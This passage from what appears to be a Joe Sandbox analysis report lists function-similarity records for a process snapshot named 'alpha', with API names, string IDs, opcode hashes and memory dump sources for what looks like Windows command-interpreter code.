                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                              • Instruction ID: 70fb226508a1d4369a148f05884a330b52c0c9265a2e3f566713337454736706
                                              • Opcode Fuzzy Hash: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                              • Instruction Fuzzy Hash: 3F91C233A0869296EB248F24D9103F976A0FB4EB6CF004135DA4E877E4EF3EE595C605
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _get_osfhandlememset$wcschr
                                              • String ID: DPATH
                                              • API String ID: 3260997497-2010427443
                                              • Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                              • Instruction ID: 94c8c32f737233536db5eeb305ed038b14589eea5bb99206ab3239eba5ff7847
                                              • Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                              • Instruction Fuzzy Hash: 8ED1AC23A0865282EA219B25D4503FE62A1FF4DBACF044235DA1D877F4DF3EE845874A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                              • String ID: @P
                                              • API String ID: 1801357106-3670739982
                                              • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                              • Instruction ID: 956fdc941fbe15a62fee658de14eec34ef515b113a844ff841e6c7c70808801d
                                              • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                              • Instruction Fuzzy Hash: 22414C33B04A82DEE7108F60E4443ED6BA0FB8D76CF845235DA0D82AA8DF79D508C749
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$BufferConsoleInfoScreen
                                              • String ID:
                                              • API String ID: 1034426908-0
                                              • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                              • Instruction ID: 64c584ff1cb67dcb6368377cfc94af661b4be8500914a87ecdf7e7cf6f39f556
                                              • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                              • Instruction Fuzzy Hash: 58F1C033A087D28AEB24CB21D8403E967A0FF4A76CF404134DA4E876A5DF7DE645C746
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CloseValue$CreateDeleteOpen
                                              • String ID: %s=%s$\Shell\Open\Command
                                              • API String ID: 4081037667-3301834661
                                              • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                              • Instruction ID: b9794d8e301b8b657e17d8edcfd6b70009e6934b85876d0897bf7795bc02ab57
                                              • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                              • Instruction Fuzzy Hash: E771D623B19B8282EB508B55E0503F9A2A1FF8DBA8F444131DE4E877E4DF3EE5498745
                                              APIs
                                              • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB19AA85
                                              • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB19AACF
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB19AAEC
                                              • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6EB1998C0), ref: 00007FF6EB19AB39
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6EB1998C0), ref: 00007FF6EB19AB6F
                                              • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6EB1998C0), ref: 00007FF6EB19ABA4
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6EB1998C0), ref: 00007FF6EB19ABCB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CloseDeleteValue$CreateOpen
                                              • String ID: %s=%s
                                              • API String ID: 1019019434-1087296587
                                              • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                              • Instruction ID: 8049b95ee1353a60d58da7402a6aa6d0db180aa12eda15f9351b1da82214d8a9
                                              • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                              • Instruction Fuzzy Hash: AE519633B18792C6E7608B65E4447FA76A1FB8D7A4F444234CA4DC37A4DF3AD4498B06
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsnicmpwcsrchr
                                              • String ID: COPYCMD
                                              • API String ID: 2429825313-3727491224
                                              • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                              • Instruction ID: e4d14422dbae43b58e2ff61188029cf241e5834e9c21ec7d040f014ca5932364
                                              • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                              • Instruction Fuzzy Hash: A8F18223F0865286FB608F51D0443FD32A1AB0DBACF004239DE5DA36E8DE7EA555C74A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$FullNamePathwcsrchr
                                              • String ID:
                                              • API String ID: 4289998964-0
                                              • Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                              • Instruction ID: f3ef13f3ae88038834d718ca46ec350c478affe99d85e721616e516ec3a9d847
                                              • Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                              • Instruction Fuzzy Hash: 4BC1D523B0939682EA549B51D5483F963A0FB5DBB8F005530CE0E837F0DF7EA491874A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                              • String ID:
                                              • API String ID: 3476366620-0
                                              • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                              • Instruction ID: 044b85cc3b8463fa12efd68c7a85612ad2143e10a661273542f52440968bbfe0
                                              • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                              • Instruction Fuzzy Hash: AC212122908A4396EA146B20A9553F96791FF8DB7DF845235C51EC22F5DF3EB408C60A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                              • String ID: %9d
                                              • API String ID: 1006866328-2241623522
                                              • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                              • Instruction ID: 51e7e19ee802f117d0fdc7442b3f49c00505855945e204659e8ec24192409032
                                              • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                              • Instruction Fuzzy Hash: BC515E73A08652CAE3008F21E8903E977A0FB49778F414635DA2D977F5CF7EA5458B0A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset
                                              • String ID:
                                              • API String ID: 2221118986-0
                                              • Opcode ID: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                              • Instruction ID: 9c4e64ef89a6cfa99c4076ff05f4ea91672283b4cecd18940507e6319869a7f9
                                              • Opcode Fuzzy Hash: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                              • Instruction Fuzzy Hash: 36C1DF33A0979286EB618B21E850BF963A4FB9A7ACF044131DA0D877F4DF7EE1458305
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocateProcess
                                              • String ID:
                                              • API String ID: 1357844191-0
                                              • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                              • Instruction ID: 084b3e392a0110682bfcd6b17ba879100b43ce34f1347259e072acee626457cb
                                              • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                              • Instruction Fuzzy Hash: F0A1DF33A1865282EA509B25E4517FA62A1FF8DBA8F404035DE4EC37F4DF7EE405874A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$DiskFreeSpace
                                              • String ID: %5lu
                                              • API String ID: 2448137811-2100233843
                                              • Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                              • Instruction ID: f8bab77daf7c69269cc75b6559e686c22f764331b37a0fd9f688e219f98dede5
                                              • Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                              • Instruction Fuzzy Hash: 14419123708AC195EB61DF11E8407EAB360FB89798F448036DA4D8B768DF7DD249CB05
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsicmp
                                              • String ID: GeToken: (%x) '%s'
                                              • API String ID: 2081463915-1994581435
                                              • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                              • Instruction ID: 97d337850bf8e61276094fb12efd3c5c975a32252d782ffb75725ad8bedd42a8
                                              • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                              • Instruction Fuzzy Hash: 5271BC63E0C26685FB64AB24E4943F426E0AF0E77CF440835D50EC36F4DFBEA481864A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr
                                              • String ID:
                                              • API String ID: 1497570035-0
                                              • Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                              • Instruction ID: ae1f9e31cb1f0237a6c40be2689939f25fb3779d7efcfa443464ff38214c98b8
                                              • Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                              • Instruction Fuzzy Hash: 21C10723A0869282EA519B16E4503FA67A0FF8D7ACF044135EA4EC77F5DF7EE4018706
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Find$File$CloseFirstNext
                                              • String ID:
                                              • API String ID: 3541575487-0
                                              • Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                              • Instruction ID: 1dcba4797cc4799de1bd9c805f8a26903b3e5a723a28bccee8932f9202be4f4b
                                              • Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                              • Instruction Fuzzy Hash: 9DA1F063B1839681EE149B6594143F96290AF4DBF8F444230EF6EC77E4EF3EE4418206
                                              APIs
                                                • Part of subcall function 00007FF6EB17CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDA6
                                                • Part of subcall function 00007FF6EB17CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDBD
                                              • _pipe.MSVCRT ref: 00007FF6EB176C1E
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB176CD1
                                              • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF6EB176CFB
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heapwcschr$AllocateDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                              • String ID:
                                              • API String ID: 1037144754-0
                                              • Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                              • Instruction ID: 4bb76bf453cb0aba4f57fb30e4c432b308e3d2c0ea9408e87f6712070e381d5c
                                              • Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                              • Instruction Fuzzy Hash: D271BE33A0865286E7549F24D8913B976A1EF4D778F048238D65DD73F9CF3EA402870A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                              • String ID:
                                              • API String ID: 4268342597-0
                                              • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                              • Instruction ID: 69b2894c3dc3223f9794816685d1ec5468e1cfc47cee51b95e6c2d1618566372
                                              • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                              • Instruction Fuzzy Hash: B7814923A08BC281EB658F65A4403B977A0FB4DBE8F194135C94D87774DF3EE4458B1A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
